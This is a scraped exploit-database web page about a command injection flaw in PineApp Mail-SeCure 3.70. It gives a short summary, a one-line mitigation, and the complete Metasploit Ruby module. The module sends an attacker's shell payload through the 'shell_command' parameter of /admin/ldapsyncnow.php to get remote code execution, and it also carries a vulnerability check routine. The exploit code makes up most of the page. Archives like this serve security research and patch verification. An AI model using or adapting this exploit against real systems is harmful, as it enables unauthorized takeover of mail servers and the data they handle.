Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution - exploit.company
header-logo
Suggest Exploit
vendor:
Mail-SeCure
by:
Dave Weinstein, juan vazquez
7.5
CVSS
HIGH
Command Injection
78
CWE
Product Name: Mail-SeCure
Affected Version From: 3.7
Affected Version To: 3.7
Patch Exists: NO
Related CWE:
CPE: a:pineapp:mail-secure:3.70
Metasploit:
Other Scripts:
Platforms Tested: Unix
2013

PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution

This module exploits a command injection vulnerability on PineApp Mail-SeCure 3.70. The vulnerability exists on the ldapsyncnow.php component, due to the insecure usage of the shell_exec() php function. This module has been tested successfully on PineApp Mail-SeCure 3.70.

Mitigation:

Update to the latest version of PineApp Mail-SeCure.
Source

Exploit-DB raw data:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution',
      'Description'    => %q{
          This module exploits a command injection vulnerability on PineApp Mail-SeCure
        3.70. The vulnerability exists on the ldapsyncnow.php component, due to the insecure
        usage of the shell_exec() php function. This module has been tested successfully
        on PineApp Mail-SeCure 3.70.
      },
      'Author'         =>
        [
          'Dave Weinstein', # Vulnerability discovery
          'juan vazquez'    # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-185/']
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl python telnet'
            }
        },
      'Targets'        =>
        [
          [ 'PineApp Mail-SeCure 3.70', { }]
        ],
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 26 2013'
      ))

    register_options(
      [
        Opt::RPORT(7443)
      ],
      self.class
    )

  end

  def my_uri
    return normalize_uri("/admin/ldapsyncnow.php")
  end

  def check
    # Since atm of writing this exploit there isn't patch available,
    # checking for the vulnerable component should be a reliable test.
    res = send_request_cgi({
      'uri' => my_uri,
      'vars_get' => {
        'sync_now' =>'1'
      }
    })
    if res and res.code == 200 and res.body =~ /window\.setTimeout\('loaded\(\)', 2500\);/
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("#{rhost}:#{rport} - Executing payload...")
    send_request_cgi({
      'uri' => my_uri,
      'vars_get' => {
        'sync_now' =>'1', # must be 1 in order to trigger the vulnerability
        'shell_command' => payload.encoded
      }
    })
  end

end

Navigation

Suggest Exploit

Services By CQR